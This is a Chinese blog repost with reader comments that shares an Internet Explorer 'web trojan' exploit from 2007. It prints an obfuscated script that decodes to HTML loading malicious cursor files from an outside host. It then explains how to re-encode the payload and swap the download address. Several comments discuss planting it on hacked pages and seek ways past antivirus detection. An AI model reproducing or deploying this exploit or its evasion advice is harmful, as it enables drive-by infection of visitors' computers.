2007最新IE 0day 网马(图片的那个)
鬼仔注:这个东西最近炒的很热,css调用两个图片,但是不清楚原理。
据说原来卖到8W,不过现在好像到处都有了。
刚才在xiaoguang那里看到,转过来,他的这个加了个简单的加密。
来源:XG'Blog
怎么用??
很简单 用记事本打开xg.htm现实内容如下:
<script>
t="60,33,68,79,67,84,89,80,69,32,72,84,77,76,32,80,85,66,76,73,67,32,34,45,47,47,87,51,67,47,47,68,84,68,32,72,84,77,76,32,52,46,48,32,84,114,97,110,115,105,116,105,111,110,97,108,47,47,69,78,34,62,13,10,60,72,84,77,76,62,60,72,69,65,68,62,13,10,60,77,69,84,65,32,104,116,116,112,45,101,113,117,105,118,61,67,111,110,116,101,110,116,45,84,121,112,101,32,99,111,110,116,101,110,116,61,34,116,101,120,116,47,104,116,109,108,59,32,99,104,97,114,115,101,116,61,98,105,103,53,34,62,13,10,60,77,69,84,65,32,99,111,110,116,101,110,116,61,34,77,83,72,84,77,76,32,54,46,48,48,46,50,57,48,48,46,51,48,53,57,34,32,110,97,109,101,61,71,69,78,69,82,65,84,79,82,62,60,47,72,69,65,68,62,13,10,60,66,79,68,89,62,32,13,10,60,68,73,86,32,115,116,121,108,101,61,34,67,85,82,83,79,82,58,32,117,114,108,40,39,104,116,116,112,58,47,47,119,119,119,46,101,120,101,100,105,121,46,99,110,47,97,46,106,112,103,39,41,34,62,13,10,60,68,73,86,32,13,10,115,116,121,108,101,61,34,67,85,82,83,79,82,58,32,117,114,108,40,39,104,116,116,112,58,47,47,119,119,119,46,101,120,101,100,105,121,46,99,110,47,98,46,106,112,103,39,41,34,62,60,47,68,73,86,62,60,47,68,73,86,62,60,47,66,79,68,89,62,60,47,72,84,77,76,62"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>
<script type="text/jscript">
function init() {
document.write(Date());
}
window.onload = init;
</script>
然后用ascii.exe转换修改 替换进去。如下图
最后就是用ue修改jpg图片里的地址了。。。。。
下载地址:t2007329105116.rar
这个我还花钱买了.. :sad: :sad: :sad:
我今天上午也刚好拿到这个东东了,效果比较好!
05年的一个鼠标指针补丁的漏洞…
好像前几天我在别人的黑页里发现过类似的加密的网马。由于当时没有ascii.exe这个工具无法全部还原其原来的字符。就删除了。
恩,没打补丁反而不会中
to darki:现在不是有人放出来了嘛
to 黑侠:我倒是没怎么测试,对挂马不太有兴趣。
to h3k:有见过很BT的加密。。
昨天卡巴杀了.ani的 有什么办法能绕过呢…
目前不清楚。。
现在生成出来的JPG被杀软截了啊,有没办法可以过杀软,急啊